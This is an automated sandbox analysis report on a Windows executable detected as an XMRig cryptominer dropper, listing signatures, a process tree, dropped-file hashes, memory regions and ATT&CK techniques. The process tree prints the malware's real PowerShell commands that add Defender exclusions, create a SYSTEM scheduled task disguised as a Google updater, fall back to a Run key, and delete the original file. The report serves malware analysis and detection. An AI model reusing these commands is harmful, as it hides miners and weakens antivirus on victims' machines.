Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1796s
  • max time network
    1791s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    25-01-2024 16:55

General

  • Target

    grhsghsGHswgh/y97CYh67hdzFRaEy.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1224
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\y97CYh67hdzFRaEy.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\y97CYh67hdzFRaEy.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1936
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2404
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2884
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\y97CYh67hdzFRaEy.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1336
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:1628
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1624
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:2016
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:620
    • C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:2604
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        1⤵
          PID:3012
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {215398B5-0A5A-4617-AF73-F4201A7FF16A} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1056
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:284
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1672

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          45KB

          MD5

          e6d383a88e9ffe3d919af82e1a0cfdb1

          SHA1

          55c5078350fcdedc2ba39ca2df1ca779921a57e3

          SHA256

          4d07ed5f82cf67c9aa2c3f5d0fe8309eb122874edb09086e709d1394b227367e

          SHA512

          db3e2009454c58792dbee8cfb91657569e23429b2534fe5e902295348ec2a8debccdd490e56826dd071ca9df186593f82381561f47f08cdffa2b829a28fda436

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          420KB

          MD5

          88212cb0dc2ce098ad02452d6cbbe671

          SHA1

          2e48c8f99b4e06e9542651474c6b7e35c23b14c6

          SHA256

          79292d179faf4635648523fecd058cb2311ba51a96ad26d17e8706a73d573e7d

          SHA512

          c9e665aeed9ed284b73bed32e21d4ffa63a865b0171218c5fb12aff625f910636c2c57917839adfff5e47bed5d84930fef0d1e79e8387d2df06f331630b53d84

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          454f996b7f7509a9d8656edb36fb01fc

          SHA1

          25a2626ae9cc07e99ce47402e8c9d2c5f3c10523

          SHA256

          0a1c74fad7c539259849a82d4327ec11a212a1626cce27892cf8e4348a40514e

          SHA512

          7d33fc6ac1ad5278766bf341cd90c4771c22c0f3bbf9c33546cc1edb8d19b4470a1b7ed4539b7b197c912b71c9ec3ca7d2da717d3bb96afac7b50c655774a30d

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          1KB

          MD5

          d9a640deb6e8fe0151da79d21fc3c344

          SHA1

          b60035acadb675281bab5228bb3343c40f4b3160

          SHA256

          181f50f905c56a2043c18f81f26be56905c12b97f733e8561692a3156a3792cf

          SHA512

          5677097100c282f13b77ede5e0ab8aff4c28e0b5d0fddaf28193f44b801f53bde7effa47e94814c085aa8803a53a71376e538e2c6c7682d9fd3fcde610c294c2

        • memory/284-67-0x000000013F3C0000-0x000000013F5D1000-memory.dmp
          Filesize

          2.1MB

        • memory/284-45-0x000000013F3C0000-0x000000013F5D1000-memory.dmp
          Filesize

          2.1MB

        • memory/620-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-68-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-81-0x0000000000D00000-0x0000000000D20000-memory.dmp
          Filesize

          128KB

        • memory/620-131-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-117-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-115-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-78-0x00000000008C0000-0x00000000008E0000-memory.dmp
          Filesize

          128KB

        • memory/620-113-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-111-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-109-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-107-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-71-0x0000000000D00000-0x0000000000D20000-memory.dmp
          Filesize

          128KB

        • memory/620-70-0x00000000008C0000-0x00000000008E0000-memory.dmp
          Filesize

          128KB

        • memory/620-69-0x00000000000F0000-0x0000000000110000-memory.dmp
          Filesize

          128KB

        • memory/620-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-93-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/620-95-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/680-49-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/680-50-0x0000000000F94000-0x0000000000F97000-memory.dmp
          Filesize

          12KB

        • memory/680-52-0x0000000000F9B000-0x0000000001002000-memory.dmp
          Filesize

          412KB

        • memory/680-47-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/680-53-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/680-51-0x0000000000F90000-0x0000000001010000-memory.dmp
          Filesize

          512KB

        • memory/680-48-0x0000000000F90000-0x0000000001010000-memory.dmp
          Filesize

          512KB

        • memory/1048-7-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1048-5-0x000000001B280000-0x000000001B562000-memory.dmp
          Filesize

          2.9MB

        • memory/1048-13-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1048-6-0x00000000022D0000-0x00000000022D8000-memory.dmp
          Filesize

          32KB

        • memory/1048-8-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/1048-9-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/1048-10-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/1048-11-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1048-12-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/1936-0-0x000000013F1B0000-0x000000013F3C1000-memory.dmp
          Filesize

          2.1MB

        • memory/1936-29-0x000000013F1B0000-0x000000013F3C1000-memory.dmp
          Filesize

          2.1MB

        • memory/1988-36-0x00000000023D0000-0x0000000002450000-memory.dmp
          Filesize

          512KB

        • memory/1988-41-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-35-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-38-0x00000000023D0000-0x0000000002450000-memory.dmp
          Filesize

          512KB

        • memory/1988-37-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-40-0x00000000023D0000-0x0000000002450000-memory.dmp
          Filesize

          512KB

        • memory/1988-39-0x00000000023D0000-0x0000000002450000-memory.dmp
          Filesize

          512KB

        • memory/2016-72-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2016-76-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2216-56-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2216-55-0x0000000001190000-0x0000000001210000-memory.dmp
          Filesize

          512KB

        • memory/2216-54-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2216-58-0x0000000001190000-0x0000000001210000-memory.dmp
          Filesize

          512KB

        • memory/2216-59-0x0000000001190000-0x0000000001210000-memory.dmp
          Filesize

          512KB

        • memory/2216-57-0x0000000001190000-0x0000000001210000-memory.dmp
          Filesize

          512KB

        • memory/2216-60-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2404-27-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2404-26-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2404-24-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2404-25-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2404-23-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2404-20-0x00000000023D0000-0x00000000023D8000-memory.dmp
          Filesize

          32KB

        • memory/2404-22-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2404-21-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2404-19-0x000000001B070000-0x000000001B352000-memory.dmp
          Filesize

          2.9MB